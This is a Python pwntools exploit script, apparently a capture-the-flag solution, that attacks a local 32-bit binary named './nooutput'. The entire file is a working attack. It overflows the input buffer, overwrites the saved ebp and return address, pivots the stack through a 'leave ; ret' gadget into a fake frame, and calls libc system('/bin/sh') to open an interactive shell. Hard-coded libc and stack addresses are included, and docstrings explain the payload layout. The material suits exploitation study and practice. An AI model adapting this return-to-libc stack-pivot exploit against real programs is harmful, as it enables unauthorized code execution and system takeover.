import struct

from pwn import *
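# Environment-specific addresses.  The target prints nothing back, so there is
# no leak to derive these from at run time; they only hold for the exact
# binary, libc and stack layout they were read from (presumably a debugger
# session with ASLR disabled -- re-check all three before running elsewhere).
leaveret_add = 0x08048514   # `leave ; ret` gadget inside ./nooutput
libc_base = 0xf7dcd000      # load address of /usr/lib32/libc.so.6 in the target
stackAddr = 0xffffd498      # address of the first dword of the input buffer

# Distance from the first byte of the input buffer to the saved ebp of the
# vulnerable frame (hard-coded; confirm against the binary's frame layout).
BUF_LEN = 0x100


def build_payload(sys_addr, exit_addr, binsh_addr, pivot_addr, leave_ret, buf_len=BUF_LEN):
    """Return the input that pivots the stack into a fake system("/bin/sh") frame.

    Layout of the returned bytes (little-endian dwords, i386):

        [0x00]        0x90909090  placeholder popped into ebp by the pivot's `leave`
        [0x04]        sys_addr    popped by the pivot's `ret`  -> system()
        [0x08]        exit_addr   system()'s return address    -> exit()
        [0x0c]        binsh_addr  system()'s argument          -> "/bin/sh"
        [0x10..]      0x90 filler up to buf_len
        [buf_len]     pivot_addr  overwrites the saved ebp
        [buf_len + 4] leave_ret   overwrites the saved return address

    The vulnerable function's own epilogue loads pivot_addr into ebp and
    returns into `leave ; ret`; that second `leave` moves esp to pivot_addr,
    pops the placeholder, and `ret` jumps to sys_addr with exit_addr/binsh_addr
    positioned as system()'s return address and argument.  pivot_addr must
    therefore be the address of the buffer's first dword.

    Args:
        sys_addr: run-time address of libc system().
        exit_addr: run-time address of libc exit().
        binsh_addr: run-time address of a "/bin/sh" string.
        pivot_addr: run-time address of the input buffer (the fake frame).
        leave_ret: address of a `leave ; ret` gadget in the target.
        buf_len: bytes from the buffer start to the saved ebp.

    Raises:
        ValueError: if the 16-byte fake frame does not fit in buf_len.
        struct.error: if any address does not fit in 32 bits.
    """
    frame = struct.pack('<IIII', 0x90909090, sys_addr, exit_addr, binsh_addr)
    pad_len = buf_len - len(frame)
    if pad_len < 0:
        raise ValueError('buffer length %#x is too small for the fake frame' % buf_len)
    return frame + b'\x90' * pad_len + struct.pack('<II', pivot_addr, leave_ret)


def main():
    """Launch ./nooutput locally, send the pivot payload and hand over the shell."""
    context(arch='i386', os='linux')
    context.terminal = ['/usr/bin/tmux', 'splitw', '-h']

    p = process('./nooutput')

    # Offsets from the on-disk libc plus the known base give run-time addresses;
    # this assumes the target loads the very same libc file.
    lib = ELF("/usr/lib32/libc.so.6")
    sysAddr = libc_base + lib.symbols['system']
    exitAddr = libc_base + lib.symbols['exit']
    # next() works on both py2 and py3 generators (generator.next() is py2-only).
    binsh = libc_base + next(lib.search(b'/bin/sh'))

    # Wait for the prompt before sending; recvuntil is the documented name
    # (readuntil is an alias).
    p.recvuntil(b'Something:\n')
    log.info(hex(stackAddr))

    exploit = build_payload(sysAddr, exitAddr, binsh, stackAddr, leaveret_add)
    # sendline appends '\n'; it lands past the overwritten return address.
    p.sendline(exploit)
    p.interactive()


if __name__ == '__main__':
    main()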